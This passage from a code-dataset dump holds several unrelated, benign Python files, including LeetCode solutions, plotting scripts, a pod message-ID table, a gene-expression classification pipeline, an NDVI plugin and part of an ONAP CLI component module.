startdate=dat(2012, 1, 1)))\r\n data.append(td().get_Info(katList=[\"st2\"],\r\n bedDict={'skticket': \"SK Ticket\", \"region\": [3, 9]},\r\n interval=\"daily\", minAvg=100, startdate=dat(2012, 1, 2), baseline=\"kunden\"))\r\n data.append(td().get_Info(katList=[\"st3\"],\r\n bedDict={'skticket': \"SK Ticket\", \"region\": [3, 9]},\r\n interval=\"daily\", minAvg=100, startdate=dat(2012, 2, 1)))\r\n show_lineplot(data, save=r\"C://Dokumente und Einstellungen//All Users//Desktop//PdfTest.pdf\", show=True)\r\n","sub_path":"naos-python/Source/YF/linegraph.py","file_name":"linegraph.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"310852119","text":"#\n# @lc app=leetcode.cn id=1 lang=python\n#\n# [1] 两数之和\n#\n\n# @lc code=start\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n length = len(nums)\n dic1 = {}\n for i in range(length):\n j = dic1.get(target-nums[i],-1)\n if not j == -1:\n return [j,i]\n dic1[nums[i]] = i\n\n \n \n# @lc 
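# --- Illustrative aside (not part of the original file) ---
# Usage of the hash-map two-sum above: one pass, probing for target - nums[i]
# before inserting nums[i], so each pair is seen exactly once in O(n).
def two_sum(nums, target):
    seen = {}
    for i, v in enumerate(nums):
        j = seen.get(target - v)
        if j is not None:
            return [j, i]
        seen[v] = i
    return []

assert two_sum([2, 7, 11, 15], 9) == [0, 1]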
code=end\n\n","sub_path":"Week_02/1.两数之和.py","file_name":"1.两数之和.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"522774144","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sys import exit\n\n\nq = 5.\nv0 = 10.\nDr = 20.\nomega0 = 1\nrho = 0.2\nN = 300\n\nL = (N/rho)**(1./3)\nL = 10.\nomega = 2*np.pi*omega0/L\n\ndef w(y):\n\treturn q*np.sin(omega*y)\ndef wp(y):\n\treturn q*omega*np.cos(omega*y)\n\ndef Ap(y):\n\tD = 1+w(y)*w(y)\n\treturn wp(y)*(1-w(y)*w(y))/(D*D)\ndef Bp(y):\n\tD= 1+w(y)*w(y)\n\treturn -2.*w(y)*wp(y)/(D*D)\n\ny = np.linspace(0,L,1000)\npx = Ap(y)\npy = Bp(y)\n\nc = -v0/(6*Dr)\n\nplt.plot(y,px*c,label='px')\nplt.plot(y,py*c,label='py')\n\nplt.legend()\nplt.tight_layout()\n\nplt.show()\n\n\n\n\n","sub_path":"magnetic_fixed_dt_flux/plot_magnetic.py","file_name":"plot_magnetic.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"141846588","text":"from datetime import date\r\nanonasci = int(input('digite o seu ano de nascimento'))\r\nano = date.today().year\r\nidade = ano - anonasci\r\nif idade < 18:\r\n print('ainda nao se alistou')\r\nelif idade > 18:\r\n print('ja se alistou')\r\nelse:\r\n print('esta na hora de se alistar')\r\n","sub_path":"python/exercicios/ex039.py","file_name":"ex039.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"602538427","text":"class MessageList():\n\tmessages = \t{\n\t\t\t\t'stop':{ #stop\n\t\t\t\t\t'id':'1',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'get_engine_status':{ #get engine status\n\t\t\t\t\t'id':'2',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'move':{ #move pod at given speed\n\t\t\t\t\t'id':'4',\n\t\t\t\t\t'data':'',\n\t\t\t\t\t'input_data': True\n\t\t\t\t},\n\t\t\t\t'get_engine_status_l':{ #get status of all engines\n\t\t\t\t\t'id':'5',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'engine_status_l':{ #engine L status\n\t\t\t\t\t'id':'6',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'engine_status_r':{ #engine R status\n\t\t\t\t\t'id':'7',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'tilt_l':{ #tilt engine L\n\t\t\t\t\t'id':'8',\n\t\t\t\t\t'data':'',\n\t\t\t\t\t'input_data': True\n\t\t\t\t},\n\t\t\t\t'tilt_r':{ #tilt engine R\n\t\t\t\t\t'id':'9',\n\t\t\t\t\t'data':'',\n\t\t\t\t\t'input_data': True\n\t\t\t\t},\n\t\t\t\t'start_l':{ #start engine L\n\t\t\t\t\t'id':'10',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'start_r':{ #start engine R\n\t\t\t\t\t'id':'11',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'stop_l':{ #stop engine L\n\t\t\t\t\t'id':'12',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'stop_r':{ #stop engine R\n\t\t\t\t\t'id':'13',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'start':{ #startup sequnce of pod\n\t\t\t\t\t'id':'14',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'uc_temp_req':{ #umbillical connector temp request message\n\t\t\t\t\t'id':'15',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'uc_temp_data':{ #umbillical connector temp data response\n\t\t\t\t\t'id':'16',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'batt_temp_req':{ #battery temp request\n\t\t\t\t\t'id':'17',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'batt_temp_data':{ #battery temp data response\n\t\t\t\t\t'id':'18',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'batt_power_req':{ #battery power level 
request\n\t\t\t\t\t'id':'19',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'batt_power_data':{ #battery power data level response\n\t\t\t\t\t'id':'20',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'so_temp_req':{ #standard outlet temperature request\n\t\t\t\t\t'id':'21',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'so_temp_data':{ #standard outlet temperature data response\n\t\t\t\t\t'id':'22',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'hover_height_req':{ #hover height request message\n\t\t\t\t\t'id':'23',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'hover_height_data':{ #hover height data response\n\t\t\t\t\t'id':'24',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'get_hover_height':{ #hover height request from ground station\n\t\t\t\t\t'id':'25',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_temp_req':{ #pod cabin internal temperature request\n\t\t\t\t\t'id':'26',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_temp_data':{ #pod cabin internal temperature data\n\t\t\t\t\t'id':'27',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_attitude_req':{ #pod attitude request\n\t\t\t\t\t'id':'28',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_attitude_data':{ #pod attitude data\n\t\t\t\t\t'id':'29',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_pressure_req':{ #pod cabin internal pressure req\n\t\t\t\t\t'id':'30',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_pressure_data':{ #pod cabin internal pressure data\n\t\t\t\t\t'id':'31',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_position_req':{ #pod position request\n\t\t\t\t\t'id':'32',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'pod_position_data':{ #pod positon data\n\t\t\t\t\t'id':'33',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'get_pod_status':{ #pod positon data\n\t\t\t\t\t'id':'34',\n\t\t\t\t\t'data':'',\n\t\t\t\t}\n\t\t\t}\n\n\tids = \t{\n\t\t\t\t'1':{ #stop\n\t\t\t\t\t'name':'stop',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'2':{ #get engine status\n\t\t\t\t\t'name':'get_engine_status',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'4':{ #move pod at given speed\n\t\t\t\t\t'name':'move',\n\t\t\t\t\t'data':'',\n\t\t\t\t\t'input_data': True\n\t\t\t\t},\n\t\t\t\t'5':{ #get status of all engines\n\t\t\t\t\t'name':'get_engine_status_l',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'6':{ #engine L status\n\t\t\t\t\t'name':'engine_status_l',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'7':{ #engine R status\n\t\t\t\t\t'name':'engine_status_r',\n\t\t\t\t\t'data':''\n\t\t\t\t},\n\t\t\t\t'8':{ #tilt engine L\n\t\t\t\t\t'name':'tilt_l',\n\t\t\t\t\t'data':'',\n\t\t\t\t\t'input_data': True\n\t\t\t\t},\n\t\t\t\t'9':{ #tilt engine R\n\t\t\t\t\t'name':'tilt_r',\n\t\t\t\t\t'data':'',\n\t\t\t\t\t'input_data': True\n\t\t\t\t},\n\t\t\t\t'10':{ #start engine L\n\t\t\t\t\t'name':'start_l',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'11':{ #start engine R\n\t\t\t\t\t'name':'start_r',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'12':{ #stop engine L\n\t\t\t\t\t'name':'stop_l',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'13':{ #stop engine R\n\t\t\t\t\t'name':'stop_r',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'14':{ #startup sequnce of pod\n\t\t\t\t\t'name':'start',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'15':{ #umbillical connector temp request message\n\t\t\t\t\t'name':'uc_temp_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'16':{ #umbillical connector temp data response\n\t\t\t\t\t'name':'uc_temp_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'17':{ #battery temp request\n\t\t\t\t\t'name':'batt_temp_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'18':{ 
#battery temp data response\n\t\t\t\t\t'name':'batt_temp_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'19':{ #battery power level request\n\t\t\t\t\t'name':'batt_power_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'20':{ #battery power data level response\n\t\t\t\t\t'name':'batt_power_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'21':{ #standard outlet temperature request\n\t\t\t\t\t'name':'so_temp_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'22':{ #standard outlet temperature data response\n\t\t\t\t\t'name':'so_temp_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'23':{ #hover height request message\n\t\t\t\t\t'name':'hover_height_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'24':{ #hover height data response\n\t\t\t\t\t'name':'hover_height_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'25':{ #hover height request from ground station\n\t\t\t\t\t'name':'get_hover_height',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'26':{ #pod cabin internal temperature request\n\t\t\t\t\t'name':'pod_temp_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'27':{ #pod cabin internal temperature data\n\t\t\t\t\t'name':'pod_temp_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'28':{ #pod attitude request\n\t\t\t\t\t'name':'pod_attitude_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'29':{ #pod attitude data\n\t\t\t\t\t'name':'pod_attitude_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'30':{ #pod cabin internal pressure req\n\t\t\t\t\t'name':'pod_pressure_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'31':{ #pod cabin internal pressure data\n\t\t\t\t\t'name':'pod_pressure_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'32':{ #pod position request\n\t\t\t\t\t'name':'pod_position_req',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'33':{ #pod positon data\n\t\t\t\t\t'name':'pod_position_data',\n\t\t\t\t\t'data':'',\n\t\t\t\t},\n\t\t\t\t'34':{ #pod positon data\n\t\t\t\t\t'name':'get_pod_status',\n\t\t\t\t\t'data':'',\n\t\t\t\t}\n\t\t\t}\n\n\n","sub_path":"IDs.py","file_name":"IDs.py","file_ext":"py","file_size_in_byte":5917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"443490850","text":"#!/usr/bin/env python2.7\n\nimport sys\nsys.path.append('/opt/hydra/')\n\nimport argparse\nimport bnpy\nimport logging\nimport numpy as np\nimport os\nimport pandas as pd\nimport shutil\n\nimport library.analysis as hydra\nfrom library.utils import mkdir_p\nfrom library.fit import get_assignments\n\n\nens_to_hugo = {}\nwith open('/opt/typhon/data/EnsGeneID_Hugo_Observed_Conversions.txt') as f:\n header = next(f)\n for line in f:\n hugo, ens = line.strip().split('\\t')\n ens_to_hugo[ens] = hugo\n\n\ndef fit_models(data, diagnosis, output_dir):\n logger = logging.getLogger('root')\n models_pth = os.path.join('/opt/typhon/models/', diagnosis)\n\n # Load Enrichment Analysis\n for model in os.listdir(models_pth):\n logger.info(\"Applying %s model\" % model)\n model_pth = os.path.join(models_pth, model, model)\n hmodel = bnpy.ioutil.ModelReader.load_model_at_prefix(model_pth,\n prefix=model)\n # Load original training data\n train_pth = os.path.join(models_pth, model, model, 'training-data.tsv')\n train_data = pd.read_csv(train_pth, sep='\\t', index_col=0)\n\n fit = hydra.PreFitMultivariateModel(hmodel, train_data)\n assignment, subgsea = fit.sub_cluster_gsea(data['TPM'])\n\n # Place model in cluster\n logger.debug(\"Place in cluster %d\" % assignment)\n if pd.isnull(assignment):\n logger.info(\"WARNING: Could not classify sample!\")\n 
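# --- Illustrative aside (not part of the original file) ---
# MessageList above (IDs.py) keeps two hand-written tables: name -> id and
# id -> name. The second can be derived from the first, which avoids the two
# copies drifting apart. A sketch of that inversion:
def invert_messages(messages):
    ids = {}
    for name, info in messages.items():
        entry = {'name': name}
        # carry over every field except the id itself ('data', 'input_data', ...)
        entry.update({k: v for k, v in info.items() if k != 'id'})
        ids[info['id']] = entry
    return ids

_demo = {'stop': {'id': '1', 'data': ''}, 'move': {'id': '4', 'data': '', 'input_data': True}}
assert invert_messages(_demo)['4']['name'] == 'move'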
continue\n\n output_dir = os.path.join(output_dir, model)\n mkdir_p(output_dir)\n feature_src = os.path.join(models_pth, model, 'features', str(assignment), \"cluster-GSEA.tsv\")\n feature_dest = os.path.join(output_dir, 'CLUSTER_GSEA_%d' % assignment)\n shutil.copyfile(feature_src, feature_dest)\n\n sub_dest = os.path.join(output_dir, 'SUBCLUSTER_GSEA_%d' % assignment)\n subgsea.sort_values(\"NES\", ascending=False).to_csv(sub_dest, sep='\\t')\n\ndef main():\n \"\"\"\n Typhon Pipeline\n \"\"\"\n parser = argparse.ArgumentParser(description=main.__doc__,\n formatter_class=argparse.RawTextHelpFormatter)\n\n parser.add_argument('--diagnosis',\n help='Patient diagnosis',\n required=True)\n\n parser.add_argument('--RSEM',\n help='Path to N-of-1 RSEM file.',\n required=True)\n\n parser.add_argument('-o', '--output-dir',\n help='Output directory',\n default='typhon-output')\n\n parser.add_argument('--debug',\n action='store_true',\n default=False)\n\n args = parser.parse_args()\n\n available_models = ['MYCN-NA-Neuroblastoma']\n\n if args.diagnosis not in available_models:\n msg = \"Please select one of the following diagnoses:\\n%s\" % '\\n'.join(available_models)\n raise ValueError(msg)\n\n # Set up logger\n level = logging.INFO\n\n # Make the output directory if it doesn't already exist\n mkdir_p(args.output_dir)\n\n logging.basicConfig(filename=os.path.join(args.output_dir, 'typhon.log'),\n level=level)\n logging.getLogger().addHandler(logging.StreamHandler())\n logger = logging.getLogger('root')\n\n\n # Read in RSEM file\n data = pd.read_csv(args.RSEM, sep='\\t')\n\n # Convert to hugo ids\n data['hugo'] = data['gene_id'].map(ens_to_hugo)\n tpm = data.reindex(['hugo', 'TPM'], axis=1).groupby('hugo').sum()\n exp = np.log2(tpm + 1)\n\n logger.info(\"Starting run...\")\n fit_models(exp, args.diagnosis, args.output_dir)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"typhon/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"110530806","text":"#Time :O(n)\nclass Solution(object):\n def sortColors(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n color = [0,1,2]\n start = 0\n for i in xrange(len(color)):\n #if the current color is the same with the target \n #loop terminate when start = last index, since j = start+1\n while start < len(nums)-1 and nums[start] == color[i]:\n start +=1\n\n #at this moment the nums[start] is not color[i]\n for j in xrange(start+1,len(nums)):\n if nums[j] == color[i]:\n nums[j], nums[start] = nums[start], nums[j]\n start +=1","sub_path":"sort_color.py","file_name":"sort_color.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"111323287","text":"\"\"\"empty message\n\nRevision ID: 2d12ebb61a42\nRevises: 11c2d2c0e508\nCreate Date: 2019-10-20 19:48:06.378993\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '2d12ebb61a42'\ndown_revision = '11c2d2c0e508'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
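# --- Illustrative aside (not part of the original file) ---
# The sortColors solution above makes one selection pass per color (O(n)
# total with three fixed colors). The classic single-pass alternative is the
# Dutch national flag partition with three pointers:
def sort_colors(nums):
    low, mid, high = 0, 0, len(nums) - 1
    while mid <= high:
        if nums[mid] == 0:
            nums[low], nums[mid] = nums[mid], nums[low]
            low += 1
            mid += 1
        elif nums[mid] == 1:
            mid += 1
        else:  # nums[mid] == 2
            nums[mid], nums[high] = nums[high], nums[mid]
            high -= 1
    return nums

assert sort_colors([2, 0, 2, 1, 1, 0]) == [0, 0, 1, 1, 2, 2]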
###\n op.add_column('participants', sa.Column('first_name', sa.String(length=20), nullable=True))\n op.add_column('participants', sa.Column('is_active', sa.Boolean(), nullable=True))\n op.add_column('participants', sa.Column('last_name', sa.String(length=30), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('participants', 'last_name')\n op.drop_column('participants', 'is_active')\n op.drop_column('participants', 'first_name')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/2d12ebb61a42_.py","file_name":"2d12ebb61a42_.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"252824236","text":"# -- coding: utf-8 --\r\n\r\nimport os\r\nfrom common.process import ProcessBase\r\nfrom utils.ArcPyUtil import ArcPyUtil\r\nfrom utils.StringFormat import StringFormat\r\nfrom utils.FileUtil import BaseFile \r\n\r\n\r\nclass Vege_NDVI_Comp_FY3AMERSI(ProcessBase):\r\n '''\r\n 植被检测 FY3AMERSI\r\n ''' \r\n \r\n def __init__(self, pluginTemp, daoIns): \r\n BasBaseProcessinit__(self, pluginTemp, daoIns)\r\n \r\n \r\n def setIDLOutName(self, pluginTemp):\r\n # 传入参数为 算法-任务编号-时间(yyyyMMdd) 每个月的文件 输出月0000/上旬0001/中旬0002/下旬0003四个产品Tif文件 0000-0003标识由IDL自行添加 \r\n # 每个文件完整的输出名称:算法-任务编号-时间(yyyyMMddHHmm).tif\r\n # 第一个参数表示当前月份信息 yyyyMM \r\n timeStr = pluginTemp.getParamByIndex(0)\r\n if timeStr == None:\r\n return None\r\n timeStr = timeStr + \"01\"\r\n timeStruct = StringFormat.isValidDateStr(timeStr, \"%Y%m%d\")\r\n if timeStruct == None:\r\n return None \r\n return pluginTemp.getPluginName() + \"-\" + pluginTemp.getProdID() + \"-\" + timeStr\r\n \r\n\r\n def checkIDLResult(self, pluginTemp):\r\n try:\r\n self.idlOutMap = {}\r\n idlOutDir = pluginTemp.getDirOut() \r\n idlOutName = pluginTemp.getIDLOutName()\r\n \r\n monthAllPath = os.path.join(idlOutDir, idlOutName + \"0000.tif\")\r\n monthFirstPath = os.path.join(idlOutDir, idlOutName + \"0001.tif\")\r\n monthMedPath = os.path.join(idlOutDir, idlOutName + \"0002.tif\")\r\n monthLastPath = os.path.join(idlOutDir, idlOutName + \"0003.tif\")\r\n \r\n if BaseFile.isFileOrDir(monthAllPath) == BaseFile.ISFILE:\r\n self.idlOutMap[\"MonthAll\"] = monthAllPath\r\n if BaseFile.isFileOrDir(monthFirstPath) == BaseFile.ISFILE:\r\n self.idlOutMap[\"MonthFirst\"] = monthFirstPath\r\n if BaseFile.isFileOrDir(monthMedPath) == BaseFile.ISFILE:\r\n self.idlOutMap[\"MonthMed\"] = monthMedPath\r\n if BaseFile.isFileOrDir(monthLastPath) == BaseFile.ISFILE:\r\n self.idlOutMap[\"MonthLast\"] = monthLastPath\r\n \r\n if \"MonthAll\" in self.idlOutMap.keys():\r\n pluginTemp.setIDLOutPath(idlOutDir, idlOutName + \"0000.tif\")\r\n return True\r\n else:\r\n return False\r\n except:\r\n return False\r\n \r\n \r\n def checkValueAry(self, pluginTemp):\r\n valueAry = pluginTemp.getValueAry() \r\n if len(valueAry) != 5:\r\n return False\r\n else:\r\n return True\r\n \r\n \r\n def getSubProdID(self, idlPath, pluginTemp):\r\n fileAry = BaseFile.getFilePathInfo(idlPath, True)\r\n if fileAry == None:\r\n return \"\"\r\n fileNameNoEx = fileAry[1]\r\n strAry = StringFormat.getStrSplitArray(fileNameNoEx, \"-\")\r\n if len(strAry) != 3:\r\n return \"\"\r\n timeStr = strAry[2]\r\n timeStruct = StringFormat.isValidDateStr(timeStr, \"%Y%m%d%H%M\")\r\n if timeStruct == None:\r\n return \"\"\r\n # 月及上中下旬的产品存在相应年的文件夹下\r\n subProdID = timeStr\r\n dirOut = os.path.join(pluginTemp.getDirOut(), 
subProdID)\r\n BaseFile.creatDir(dirOut) \r\n return subProdID\r\n \r\n \r\n def areaStatAndClip(self, tempDir, idlPath, isProvince, subProID, pluginTemp):\r\n areaIDCur = pluginTemp.getAreaID() \r\n prodName = pluginTemp.getProdName()\r\n pluginName = pluginTemp.getPluginName()\r\n prodID = pluginTemp.getProdID()\r\n dirOut = os.path.join(pluginTemp.getDirOut(), subProID)\r\n valueAry = pluginTemp.getValueAry() \r\n dirDepend = pluginTemp.getDirDepend()\r\n countyShp = pluginTemp.getDependFile(\"AreaCounty.shp\") \r\n cityShp = pluginTemp.getDependFile(\"AreaCity.shp\") \r\n provinceShp = pluginTemp.getDependFile(\"AreaProvince.shp\")\r\n rootAreaInfo = pluginTemp.getRootAreaInfo() \r\n \r\n # 经纬度投影转换为等面积投影\r\n idlAlbersPath = ArcPyUtil.changeToAlbersProj(idlPath, tempDir)\r\n if idlAlbersPath == None:\r\n return False\r\n \r\n index = 0 \r\n dataMap = {}\r\n for valueStr in valueAry:\r\n dataLists = ArcPyUtil.areaStatAreaDAO(tempDir, idlAlbersPath, countyShp, cityShp, provinceShp, valueStr, areaIDCur, isProvince, rootAreaInfo)\r\n if dataLists != None: \r\n for key in dataLists.keys():\r\n areaStr = dataLists[key]\r\n if not key in dataMap.keys():\r\n dataMap[key] = {}\r\n areaInfo = dataMap[key]\r\n levelType = \"Level\" + str(index + 1)\r\n areaInfo[levelType] = areaStr\r\n index += 1 \r\n \r\n for areaID in dataMap.keys():\r\n areaInfo = dataMap[areaID]\r\n lev1Area = \"0\"\r\n lev2Area = \"0\"\r\n lev3Area = \"0\"\r\n lev4Area = \"0\"\r\n lev5Area = \"0\"\r\n if \"Level1\" in areaInfo.keys():\r\n lev1Area = areaInfo[\"Level1\"]\r\n if \"Level2\" in areaInfo.keys():\r\n lev2Area = areaInfo[\"Level2\"]\r\n if \"Level3\" in areaInfo.keys():\r\n lev3Area = areaInfo[\"Level3\"] \r\n if \"Level4\" in areaInfo.keys():\r\n lev4Area = areaInfo[\"Level4\"] \r\n if \"Level5\" in areaInfo.keys():\r\n lev5Area = areaInfo[\"Level5\"] \r\n self.daoIns.insertProdInfo(prodName, pluginName, prodID, areaID, [lev1Area, lev2Area, lev3Area, lev4Area, lev5Area], subProID)\r\n self.doClipSrcTif(idlPath, dirDepend, areaID, tempDir, dirOut)\r\n \r\n # 生成专题图\r\n ArcPyUtil.creatJPG(dirDepend, dirOut, idlPath, prodName, areaIDCur, isProvince, prodID, dataMap.keys())\r\n \r\n return True\r\n \r\n","sub_path":"src/appGuangXi/pluginGX/Vege_NDVI_Comp_FY3AMERSI.py","file_name":"Vege_NDVI_Comp_FY3AMERSI.py","file_ext":"py","file_size_in_byte":6142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"369621131","text":"# ============LICENSE_START=======================================================\n# org.onap.dcae\n# ================================================================================\n# Copyright (c) 2017-2018 AT&T Intellectual Property. 
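# --- Illustrative aside (not part of the original file) ---
# The Vege_NDVI plugin above names its monthly products
# "<plugin>-<prodID>-<yyyyMMdd>" and expects IDL to emit four variants with
# suffixes 0000 (whole month) / 0001 / 0002 / 0003 (early/mid/late ten-day
# periods). A standalone sketch of building and validating such names; the
# prodID "42" is hypothetical.
import datetime

def build_out_name(plugin_name, prod_id, yyyymm):
    # validate the month parameter the same way strptime would
    datetime.datetime.strptime(yyyymm + '01', '%Y%m%d')
    return '{0}-{1}-{2}01'.format(plugin_name, prod_id, yyyymm)

def expected_outputs(out_name):
    return [out_name + suffix + '.tif' for suffix in ('0000', '0001', '0002', '0003')]

name = build_out_name('Vege_NDVI_Comp_FY3AMERSI', '42', '202001')
assert expected_outputs(name)[0] == 'Vege_NDVI_Comp_FY3AMERSI-42-202001010000.tif'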
All rights reserved.\n# ================================================================================\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============LICENSE_END=========================================================\n#\n# ECOMP is a trademark and service mark of AT&T Intellectual Property.\n\n# -*- coding: utf-8 -*-\n\"\"\"\nProvides component commands\n\"\"\"\nimport json\nfrom pprint import pformat\n\nimport click\nimport os\n\nfrom discovery_client import resolve_name\n\nfrom dcae_cli.util import profiles, load_json, dmaap, inputs, policy\nfrom dcae_cli.util.run import run_component, dev_component\nfrom dcae_cli.util import discovery as dis\nfrom dcae_cli.util import docker_util as du\nfrom dcae_cli.util.discovery import DiscoveryNoDownstreamComponentError\nfrom dcae_cli.util.undeploy import undeploy_component\nfrom dcae_cli.util.exc import DcaeException\n\nfrom dcae_cli.commands import util\nfrom dcae_cli.commands.util import parse_input, parse_input_pair, create_table\n\nfrom dcae_cli.catalog.exc import MissingEntry\n\n\n@click.group()\ndef component():\n pass\n\n\n@component.command(name='list')\n@click.option('--latest', is_flag=True, default=True, help='Only list the latest version of components which match the filter criteria')\n@click.option('--subscribes', '-sub', multiple=True, help='Only list components which subscribe to FORMAT')\n@click.option('--publishes', '-pub', multiple=True, help='Only list components which publish FORMAT')\n@click.option('--provides', '-pro', multiple=True, type=(str, str), help='Only list components which provide services REQ_FORMAT RESP_FORMAT')\n@click.option('--calls', '-cal', multiple=True, type=(str, str), help='Only list components which call services REQ_FORMAT RESP_FORMAT')\n@click.option('--deployed', is_flag=True, default=False, help='Display the deployed view. Shows details of deployed instances.')\n@click.pass_obj\ndef list_component(obj, latest, subscribes, publishes, provides, calls, deployed):\n '''Lists components in the public catalog. 
Uses flags to filter results.'''\n subs = list(map(parse_input, subscribes)) if subscribes else None\n pubs = list(map(parse_input, publishes)) if publishes else None\n provs = list(map(parse_input_pair, provides)) if provides else None\n cals = list(map(parse_input_pair, calls)) if calls else None\n\n user, catalog = obj['config']['user'], obj['catalog']\n # TODO: How about components that you don't own but you have deployed?\n comps = catalog.list_components(subs, pubs, provs, cals, latest, user=user)\n\n active_profile = profiles.get_profile()\n consul_host = active_profile.consul_host\n\n click.echo(\"Active profile: {0}\".format(profiles.get_active_name()))\n click.echo(\"\")\n\n def format_resolve_results(results):\n \"\"\"Format the results from the resolve_name function call\"\"\"\n if results:\n # Most likely the results will always be length one until we migrate\n # to a different way of registering names\n return \"\\n\".join([ pformat(result) for result in results ])\n else:\n return None\n\n def 